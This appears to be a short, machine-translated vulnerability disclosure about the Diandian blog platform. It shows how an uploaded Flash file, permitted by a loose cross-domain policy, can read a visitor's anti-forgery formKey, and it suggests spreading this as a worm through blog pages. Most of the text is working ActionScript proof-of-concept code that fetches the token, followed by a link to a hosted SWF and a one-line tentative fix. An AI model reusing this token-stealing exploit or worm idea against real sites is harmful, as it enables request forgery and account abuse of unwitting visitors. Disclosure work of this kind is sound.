Template static resource upload page (http://www.diandian.com/upload/asset) and Flash cross-domain communication configuration file (http://www.diandain.com/crossdomain.xml) allows the same domain name, just upload a SWF, you can read formKey. Embed the SWF into the blog page, read the visitor's formKey, call externalInterface to input the value to JS, and then worm it.
Http://x.libdd.com/farm1/f15341/7cef03a1/diandian.swf
Var result_txt = new TextField ();
Result_txt.x = 0;
Result_txt.y = 0;
Result_txt.height = 22;
Result_txt.width = 200;
AddChild (result_txt );
Var targetURL: String = "http://www.diandian.com/home ";
Var request: URLRequest = new URLRequest (targetURL );
Request. method = URLRequestMethod. GET;
Var loader: URLLoader = new URLLoader ();
Loader. addEventListener (Event. COMPLETE, completeHandler );
Function completeHandler (event: Event ){
Var formKey: String = loader. data;
FormKey = formKey. split ("window. DDformKey = '") [1]. split ("'") [0]
Result_txt.text = formKey
}
Loader. load (request)
The effect is as follows:
Solution:
Change the configuration file? Change the domain name for storing static files?
Author p. z